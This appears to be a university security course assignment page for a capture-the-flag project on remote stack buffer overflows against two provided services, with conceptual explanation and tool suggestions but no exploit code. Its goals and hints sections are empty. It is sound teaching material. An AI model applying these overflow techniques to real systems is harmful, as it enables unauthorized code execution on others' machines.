CS177: Project 5 - Remote Buffer Overflows (15% of project score)Project GoalsThe goals of this project are:
Administrative InformationThe project is an individual project. It is due on Friday, June 2, 2023, 23:59:59 PST (no further deadline extensions; late flags will not be accepted). IntroductionAs you have seen in the previous challenge, a buffer overflow occurs when a program or process tries to store more data in a buffer (or some temporary data storage area) than that buffer was intended to hold. This extra data, which has to go somewhere, overflows adjacent memory regions, corrupting or overwriting the valid data stored there. If the buffer is stored on the stack, as it is the case for local variables in C, control information such as function return addresses can be altered. This allows the attacker to redirect the execution flow to arbitrary memory addresses. By injecting machine code into the process memory (e.g., as part of the data used to overflow the buffer, or in environment variables), the attacker can redirect the execution flow to this code and execute arbitrary machine instructions with the privileges of the running process. Detailed DescriptionYour task is to exploit vulnerabilities in remote server applications. Specifically, your objective is to create and then inject appropriate exploit inputs into the target application so that you force the program to return a flag. Like for previous challenges, you will first go to our CTFd site and launch your service instances. The site will give you the address and destination port where your server is running and listening for your connections. For this challenge, we have prepared two vulnerable services. The first one is the same as we used for the last challenge (minecraft). However, now the service is running remotely and has enabled some exploit protection mechanisms. If you succeed in exploiting it, you will receive full credit for this project. The second application (lazy_panel) is significantly more challenging. You will receive extra credit (an additional 10% of your project score) if you manage to exploit it. Although we don't expect all students to be able to do so, we encourage everyone to at least give it a try. However, to keep it challenging, we don't plan to provide a lot of support for this part. You can find the source code (for the first application) and the binaries (for both) here. Both applications are compiled for 64-bit x86 on Linux. The binaries running on the server are the exact copies of the binaries you get. Our service is launched by xinetd. Xinetd is a wrapper that listens on a specific port and starts a corresponding program. When it receives data from the network, it will forward it to the (standard) input of the program. Similarly, it will send data that it gets from the program (written to the standard output) back over the network. To talk to the services and come up with exploits, we recommend pwntools. We used gcc to build the binaries from the sources, using different command line flags for the different challenges. You can use checksec to understand what security related features the binary is built with. HintsPerforming a successful remote buffer overflow can be tricky, because it is important to get all the little details right. We hope that the previous challenge has given you experience in crafting (and debugging) your exploits. In addition to the hints from the previous challenge, here are a few more bits of information for minecraft.
The second application (for extra credit): lazy_panel
|